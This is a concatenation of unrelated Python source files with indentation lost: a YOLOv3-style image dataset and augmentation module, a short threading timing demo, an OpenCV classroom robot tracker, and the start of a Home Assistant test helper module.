# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=416, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False):
try:
path = str(Path(path)) # os-agnostic
if os.path.isfile(path): # file
with open(path, 'r') as f:
f = f.read().splitlines()
elif os.path.isdir(path): # folder
f = glob.iglob(path + os.sep + '*.*')
self.img_files = [x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats]
except:
raise Exception('Error loading data from %s. See %s' % (path, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt')
for x in self.img_files]
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Read image shapes (wh)
sp = path.replace('.txt', '.shapes') # shapefile path
try:
with open(sp, 'r') as f: # read existing shapefile
s = [x.split() for x in f.read().splitlines()]
assert len(s) == n, 'Shapefile out of sync'
except:
s = [exif_size(Image.open(f)) for f in tqdm(self.img_files, desc='Reading image shapes')]
np.savetxt(sp, s, fmt='%g') # overwrites existing (if any)
# Sort by aspect ratio
s = np.array(s, dtype=np.float64)
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.shapes = s[irect]  # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / 64.).astype(np.int) * 64
# Cache labels
self.imgs = [None] * n
self.labels = [np.zeros((0, 5), dtype=np.float32)] * n
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
np_labels_path = str(Path(self.label_files[0]).parent) + '.npy' # saved labels in *.npy file
if os.path.isfile(np_labels_path):
s = np_labels_path
x = list(np.load(np_labels_path, allow_pickle=True))
if len(x) == n:
self.labels = x
labels_loaded = True
else:
s = path.replace('images', 'labels')
pbar = tqdm(self.label_files)
for i, file in enumerate(pbar):
if labels_loaded:
l = self.labels[i]
else:
try:
with open(file, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
except:
nm += 1 # print('missing labels for image %s' % self.img_files[i]) # file missing
continue
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = 'Caching labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
s, nf, nm, ne, nd, n)
assert nf > 0, 'No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
if not labels_loaded:
print('Saving labels to %s for faster future loading' % np_labels_path)
np.save(np_labels_path, self.labels) # save for next time
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
if cache_images: # if training
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
# Detect corrupted images https://medium.com/joelthchao/programmatically-detect-corrupted-image-8c1b2006c3d3
detect_corrupted_images = False
if detect_corrupted_images:
from skimage import io # conda install -c conda-forge scikit-image
for file in tqdm(self.img_files, desc='Detecting corrupted images'):
try:
_ = io.imread(file)
except:
print('Corrupted image detected: %s' % file)
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_affine(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r < 1 or (self.augment and r != 1): # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
xc, yc = [int(random.uniform(s * 0.5, s * 1.5)) for _ in range(2)] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_affine(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
border=-s // 2) # border to remove
return img4, labels4
def letterbox(img, new_shape=(416, 416), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = new_shape
ratio = new_shape[0] / shape[1], new_shape[1] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
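# Worked example (illustrative numbers): a 1280x720 image letterboxed to new_shape=416 with auto=True
# gives r = min(416/720, 416/1280) = 0.325, new_unpad = (416, 234), dw = 0, dh = 182 % 64 = 54,
# so 27 px of padding goes on the top and bottom and the returned image is 288x416 (h x w).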
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, border=0):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
# targets = [cls, xyxy]
height = img.shape[0] + border * 2
width = img.shape[1] + border * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(-translate, translate) * img.shape[0] + border # x translation (pixels)
T[1, 2] = random.uniform(-translate, translate) * img.shape[1] + border # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Combined rotation matrix
M = S @ T @ R # ORDER IS IMPORTANT HERE!!
if (border != 0) or (M != np.eye(3)).any(): # image changed
img = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_LINEAR, borderValue=(114, 114, 114))
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# reject warped points outside of image
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
w = xy[:, 2] - xy[:, 0]
h = xy[:, 3] - xy[:, 1]
area = w * h
area0 = (targets[:, 3] - targets[:, 1]) * (targets[:, 4] - targets[:, 2])
ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16)) # aspect ratio
i = (w > 4) & (h > 4) & (area / (area0 * s + 1e-16) > 0.2) & (ar < 10)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def cutout(image, labels):
# https://arxiv.org/abs/1708.04552
# https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
# https://towardsdatascience.com/when-conventional-wisdom-fails-revisiting-data-augmentation-for-self-driving-cars-4831998c5509
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
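# Note: the scales list above yields 31 candidate masks per call (1 at 1/2 scale, 2 at 1/4,
# 4 at 1/8, 8 at 1/16 and 16 at 1/32); labels that end up at least 60% covered are dropped.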
def reduce_img_size(path='../data/sm4/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def convert_images2bmp(): # from utils.datasets import *; convert_images2bmp()
# Save images
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
# for path in ['../coco/images/val2014', '../coco/images/train2014']:
for path in ['../data/sm4/images', '../data/sm4/background']:
create_folder(path + 'bmp')
for ext in formats: # ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
for f in tqdm(glob.glob('%s/*%s' % (path, ext)), desc='Converting %s' % ext):
cv2.imwrite(f.replace(ext.lower(), '.bmp').replace(path, path + 'bmp'), cv2.imread(f))
# Save labels
# for path in ['../coco/trainvalno5k.txt', '../coco/5k.txt']:
for file in ['../data/sm4/out_train.txt', '../data/sm4/out_test.txt']:
with open(file, 'r') as f:
lines = f.read()
# lines = f.read().replace('2014/', '2014bmp/') # coco
lines = lines.replace('/images', '/imagesbmp')
lines = lines.replace('/background', '/backgroundbmp')
for ext in formats:
lines = lines.replace(ext, '.bmp')
with open(file.replace('.txt', 'bmp.txt'), 'w') as f:
f.write(lines)
def recursive_dataset2bmp(dataset='../data/sm4_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='data/coco_64img.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new_folder'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
37-3.py
|
# encoding=utf-8
import select
from threading import Thread
from time import time
def slow_system_call():
select.select([],[],[],0.1)
start = time()
threads = []
for _ in range(5):
thread = Thread(target=slow_system_call)
thread.start()
threads.append(thread)
def compute_helicopter_location(index):
    pass
for i in range(5):
    compute_helicopter_location(i)
for thread in threads:
    thread.join()
end = time()
print('Took %.3f seconds' % (end - start))
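# With the five 0.1 s select() calls running concurrently in threads, the elapsed time printed
# above should be close to 0.1 s, versus roughly 0.5 s if the calls were made one after another.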
|
RobotTracker.py
|
# -*- coding: utf-8 -*-
from teachablerobots.src.Communicate import SocketComm
from teachablerobots.src.GridSpace import *
import math
from time import sleep
#import threading
import ast
from multiprocessing import Process, Queue, Event, Value, Lock, Manager
from ctypes import c_char_p
class Robot(object):
'''
Attributes:
lowColor: The minimum HSV value of the robot to track
highColor: The maximum HSV value of the robot to track
robot: An (x, y, w, h) tuple that describes the robot's location
and dimensions
contour: The contour of the robot
ellipse: an ((x,y),(w,l), a) tuple where (x,y) is the center,
(w,l) is the width and length, and a is the angle of rotation.
Used to track the robot's angle.
heading: The robot's relative angle
dir: the direction the robot is moving, "fwd", "bk"
Functions:
SetGoal(self, goal)
Run(self)
FindRobot(self, frame)
FrameOverlay(self, frame)
LocationToCoordinates(self, location)
CoordinatesToLocation(self, coordinates)
GetHeading(self, frame)
DrawGoal(self, goal)
DrawLine(self, point1, point2)
DrawPolygon(self, startPoint, sideLength, numberOfSides)
'''
def __init__(self, gridSpace, color):
if(color == "green"):
self.low = (48, 52, 149)
self.high = (89, 325, 340)
if(color == "pink"):
self.low = (56, 82, 170)
self.high = (180,271,258)
if(color == "blue"):
self.low = (55,132,142)
self.high = (114,273,273)
self.robot = ((0,0),(0,0), 0)
self.contour = []
self.heading = 0
self.dir = "fwd"
self.rLoc = (0,0)
self.goal = (0,0)
self.goalFound = False
self.displayGoals = False
self.displayGoalLoc = False
self._finished = False
self.mazeFinished = False
self.gs = gridSpace
self.m = Manager()
self.lock = Lock()
self.location = self.m.Value(c_char_p, b"(4,1)")
self.direction = self.m.Value(c_char_p, b"Up")
self.range = self.m.Value("i", 0)
self.distanceTravelled = self.m.Value('i', 0)
self.robotServer = SocketComm(5580)
self.robotComm = Process(target=self.GetRobotResponse, args=(self.location,self.direction,self.distanceTravelled,self.range,))
self.robotComm.e = Event()
#self.robotComm.daemon = True
def GetRobotResponse(self, loc, _dir, dist, r):
d = dict()
while(not self.robotServer.finished.value):
#print("size of inbox: " + str(self.robotServer.inbox.qsize()))
if(not self.robotServer.inbox.empty()):
temp = ast.literal_eval(self.robotServer.inbox.get())
try:
if("location" in temp):
self.lock.acquire()
loc.value = temp["location"].rstrip().encode('ascii')
self.lock.release()
dist.value = dist.value + 1
#print("distance travelled: " + str(dist.value))
#print("location: " + loc.value.decode('ascii'))
elif("direction" in temp):
self.lock.acquire()
_dir.value = temp["direction"].rstrip().encode('ascii')
self.lock.release()
#print("direction: " + _dir.value.decode('ascii'))
elif("range" in temp):
self.lock.acquire()
r.value = temp["range"]
print("range: " + str(temp["range"]))
self.lock.release()
else:
print("unknown: " + str(temp))
finally:
pass
return
def SendCommandSequence(self, seq):
if(len(seq) == 1 and seq == "0"):
self.robotServer.sendMessage("0")
return
else:
d = dict()
d["sequence"] = seq
self.robotServer.sendMessage(str(d))
return
def SendObjective(self, objective):
d = dict()
d["objective"] = objective
self.robotServer.sendMessage(str(d)) # i.e. objective is to drive to first quadrant
print("sent: " + objective)
return
def SetGoal(self, goal):
self.goal = goal
return
def Run(self):
c = 0
i = 0
if(self.robotServer.connected):
self.robotComm.start()
print("starting comm thread")
print("starting...")
while(not self._finished):
#print("length of inbox in loop: " + str(len(self.robotServer.inbox)))
self.gs.Update(self.FrameOverlay)
#self.FindRobot()
#self.gs.ShowFrame(title=self.gs.title)
key = cv2.waitKey(1) & 0xFF
if(key == ord("q")):
self._finished = True
elif(key == ord("c")):
cv2.imwrite("picture%i.jpg" %i, window)
i += 1
self.robotServer.e.set()
self.robotServer.finished.value = True
print("closing connection")
self.robotServer.closeConnection()
def FindRobot(self):
contours = cv2.findContours(self.gs.processedFrame, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]
if(len(contours) > 0):
cont = max(contours, key=cv2.contourArea)
if(cv2.contourArea(cont) > 200 and cv2.contourArea(cont) < 700):
temp = cv2.minAreaRect(cont)
if(abs(temp[0][0] - self.robot[0][0]) > .02 and abs(temp[0][1] - self.robot[0][1]) > .02):
self.contour = cont
self.robot = temp
return
def FrameOverlay(self): #TODO draw point, student name in text area
if(self.displayGoals):
self.DrawGoal(self.LocToCoord(self.goal), self.displayGoalLoc)
if(len(self.contour) > 0):
box = cv2.boxPoints(self.robot)
box = np.int0(box)
cv2.drawContours(self.gs.frame, [box], 0, (0, 255, 0), 2)
(x,y) = self.LocToCoord(self.robot[0])
if(not self.mazeFinished and abs(5-x) < .5 and abs(0-y) < .5):
self.goalFound = True
cv2.putText(self.gs.frameCopy, "Good Job!", (100, 240), 2, 1, (0, 255, 0), 3)
return self.gs.frame
def LocToCoord(self, location):
return (location[0] - self.gs.frameCenter[0]) / 38, (self.gs.frameCenter[1] - location[1]) / 38
def CoordToLoc(self, coordinates):
return (int(coordinates[0] *38 + self.gs.frameCenter[0])), (int(-coordinates[1]*38 + self.gs.frameCenter[1]))
def DrawGoal(self, goal, showXY):
cv2.circle(self.gs.frame,(goal[0], goal[1]), 2, (220,80,80), 2)
cv2.circle(self.gs.frame,(goal[0], goal[1]), 7, (220,80,80), 2)
cv2.circle(self.gs.frame,(goal[0], goal[1]), 12, (220,80,80), 2)
if(showXY):
cv2.putText(self.gs.frame, str(self.CoordToLoc(goal)), (goal[0]+10, goal[1]+10), cv2.FONT_HERSHEY_PLAIN, .95, (50,100,200), 2)
def DrawLine(self, point1, point2):
cv2.line(self.gs.frame, point1, point2, (255,50,155), 4)
pass
def DrawPolygon(self, startPoint, sideLength, numberOfSides):
pass
def GetHeading(self, frame):
pass
#r = Robot(GridSpace(mode=""), "green")
#r.Run()
|
common.py
|
"""Test the helper method for writing tests."""
from __future__ import annotations
import asyncio
import collections
from collections import OrderedDict
from collections.abc import Awaitable, Collection
from contextlib import contextmanager
from datetime import datetime, timedelta
import functools as ft
from io import StringIO
import json
import logging
import os
import pathlib
import threading
import time
from time import monotonic
import types
from typing import Any
from unittest.mock import AsyncMock, Mock, patch
from aiohttp.test_utils import unused_port as get_test_instance_port # noqa: F401
from homeassistant import auth, config_entries, core as ha, loader
from homeassistant.auth import (
auth_store,
models as auth_models,
permissions as auth_permissions,
providers as auth_providers,
)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import device_automation, recorder
from homeassistant.components.device_automation import ( # noqa: F401
_async_get_device_automation_capabilities as async_get_device_automation_capabilities,
)
from homeassistant.components.mqtt.models import ReceiveMessage
from homeassistant.config import async_process_component_config
from homeassistant.const import (
DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
STATE_OFF,
STATE_ON,
)
from homeassistant.core import BLOCK_LOG_TIMEOUT, HomeAssistant
from homeassistant.helpers import (
area_registry,
device_registry,
entity,
entity_platform,
entity_registry,
intent,
restore_state,
storage,
)
from homeassistant.helpers.json import JSONEncoder
from homeassistant.setup import async_setup_component, setup_component
from homeassistant.util.async_ import run_callback_threadsafe
import homeassistant.util.dt as date_util
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.uuid as uuid_util
import homeassistant.util.yaml.loader as yaml_loader
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = "https://example.com/app"
CLIENT_REDIRECT_URI = "https://example.com/app/callback"
async def async_get_device_automations(
hass: HomeAssistant,
automation_type: device_automation.DeviceAutomationType,
device_id: str,
) -> Any:
"""Get a device automation for a single device id."""
automations = await device_automation.async_get_device_automations(
hass, automation_type, [device_id]
)
return automations.get(device_id)
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
